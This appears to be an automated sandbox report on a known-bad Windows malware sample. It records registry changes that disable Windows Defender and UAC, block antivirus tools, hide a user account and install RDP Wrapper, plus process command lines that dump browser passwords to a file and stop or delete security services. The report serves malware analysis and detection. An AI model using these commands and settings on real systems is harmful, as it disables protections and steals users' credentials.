Analysis Overview
SHA256
b072506b100e143611b6b01f8e4ac35115665771f6f25685d1e5f5426cc7f03b
Threat Level: Known bad
The file bd38e93c22ab359d615e7464fd252363_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Modifies visiblity of hidden/system files in Explorer
UAC bypass
Windows security bypass
Disables service(s)
RMS
Modifies Windows Defender Real-time Protection settings
Grants admin privileges
NirSoft WebBrowserPassView
Nirsoft
Blocklisted process makes network request
Stops running service(s)
Sets file to hidden
Blocks application from running via registry modification
Server Software Component: Terminal Services DLL
Possible privilege escalation attempt
Drops file in Drivers directory
Modifies Windows Firewall
Modifies file permissions
Cryptocurrency Miner
UPX packed file
Loads dropped DLL
Executes dropped EXE
ASPack v2.12-2.42
ACProtect 1.3x - 1.4x DLL software
Reads user/profile data of web browsers
Adds Run key to start application
Checks whether UAC is enabled
Modifies WinLogon
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Hide Artifacts: Hidden Users
AutoIT Executable
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Unsigned PE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Gathers network information
Checks processor information in registry
Script User-Agent
Suspicious behavior: LoadsDriver
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Runs net.exe
Uses Task Scheduler COM API
Delays execution with timeout.exe
Suspicious behavior: SetClipboardViewer
Views/modifies file attributes
Runs .reg file with regedit
Scheduled Task/Job: Scheduled Task
System policy modification
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 15:51
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 15:51
Reported
2024-06-19 15:55
Platform
win10-20240404-en
Max time kernel
270s
Max time network
271s
Command Line
Signatures
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
RMS
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\regedit.exe | N/A |
Grants admin privileges
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\Windows\winit.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\winit.exe | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Possible privilege escalation attempt
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\rdp\RDPWInst.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Stops running service(s)
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Cryptocurrency Miner
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Programdata\Windows\winit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Programdata\Windows\winit.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133632859547787188" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\ProgramData\Microsoft\Intel\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\programdata\microsoft\intel\P.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\MIME\Database | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\programdata\microsoft\intel\MOS.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\Windows\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\ProgramData\Microsoft\Intel\Logs.exe
C:\ProgramData\Microsoft\Intel\Logs.exe -pnaxui
C:\ProgramData\Microsoft\Intel\winit.exe
C:\ProgramData\Microsoft\Intel\winit.exe -pnaxui
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Microsoft\Intel\L.bat" "
C:\ProgramData\Microsoft\Intel\Cheat.exe
C:\ProgramData\Microsoft\Intel\Cheat.exe -pnaxui
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Programdata\Windows\install.vbs"
C:\Programdata\Windows\winit.exe
"C:\Programdata\Windows\winit.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
C:\programdata\microsoft\intel\svchost.exe
"C:\programdata\microsoft\intel\svchost.exe"
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop swprv
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\sc.exe
sc stop swprv
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config swprv start= disabled
C:\programdata\microsoft\rootsystem\P.exe
"C:\programdata\microsoft\rootsystem\P.exe"
C:\Windows\SysWOW64\sc.exe
sc config swprv start= disabled
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\rootsystem\P.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\programdata\microsoft\rootsystem\1.exe
C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop crmsvc
C:\Windows\SysWOW64\sc.exe
sc stop crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Programdata\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
